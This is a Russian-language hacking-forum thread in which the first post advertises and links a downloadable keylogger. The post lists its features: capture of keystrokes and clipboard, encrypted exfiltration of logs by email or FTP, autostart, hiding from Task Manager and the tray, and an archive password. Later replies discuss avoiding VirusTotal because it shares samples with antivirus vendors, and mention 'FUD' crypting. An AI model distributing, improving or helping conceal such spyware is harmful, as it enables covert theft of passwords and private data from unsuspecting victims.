![]() |
>> Шлёт сплошной текст журнала с малой инфой о компе или шифрованный файл на почту с той же инфой, этот файл можно открыть через этот же кейлоггер, если файл с другого кейлоггера, то просто вписываем пароль от проги и открываем через неё во второй вкладке.
>> Сохраняет шифрованный файл локально в выбранную папку с тем же ключом. >> Шлёт шифрованный файл на FTP сервер. >> Защищается от диспетчера. >> Весь кейлоггер в одном файле весит ~669кб. >> Собственно - автозагрузка. >> Шлёт лог по таймеру. >> Интервал таймера в милиссекундах. >> Прячет или показывает в трэе иконку. >> Подсказки на английском языке. >> Вместе с клавишами он "парсит" буфер обмена. >> "Чувствует" русскую и английскую раскладки. >> Шифрует данные вписанные для отправки rc4 алгоритмом, ключом является главный ключ к программе. >> Главный ключ можно поменять в 5 вкладке настроек. >> "Горячая" комбинация: Shift+Alt+O. Добавлено: >> 1: Возможность сохранения всех настроек в шифрованный файл, пароль изменяется; >> 2: Возможность смены языка: Русский, Английский (Подсказки тоже переведены); >> 3: Возможность локально сохранять лог как в шифрованный файл, так и в текстовой; >> 4: Дополнительные удобства; >> 5: Почищены баги/ошибки; >> 6: Изменена горячая клавиша на Ctrl+Shift+O; >> Самая радость, что после всех добавок и исправлений файл стал весить на 5кб больше Вес архива 666кб pf Скачатьhttp://rghost.ru/48334603 P.S Можно не бить по шапке Пароль hpc.name Вот отчет с VirusTotal https://www.virustotal.com/ru/file/3...is/1377327972/ |
1. зачем заливать на virustotal ?
2.Раздел не тот. 3. не устраивайте бардак на форуме. p.s кто же таких пускает вас сюда... |
Опять с crypt-fud`a
|
Цитата:
Сообщение от SpAcE_MaN26 Опять с crypt-fud`a да так сказать делаем обмен информацией между сайтам опытом делимся |
Цитата:
Сообщение от kaiLost 1. зачем заливать на virustotal ? 2.Раздел не тот. 3. не устраивайте бардак на форуме. p.s кто же таких пускает вас сюда... 1 есть такие люди который идиоты и не доверчевые 2 нужный раздел не нашел если можно тему перекиньте в нужный раздел 3 на счет бардака не знаю |
Цитата:
Сообщение от zazkur 1 есть такие люди который идиоты и не доверчевые 2 нужный раздел не нашел если можно тему перекиньте в нужный раздел 3 на счет бардака не знаю 1.VirusTotal все сливает ав.он начнет палится очень скоро-есть же другие 2. 3. ...(я лучше промолчу.) |
Цитата:
Сообщение от kaiLost 1.VirusTotal все сливает ав.он начнет палится очень скоро-есть же другие 2. 3. ...(я лучше промолчу.) я знаю что virustotal все сливает |
| Время: 15:26 |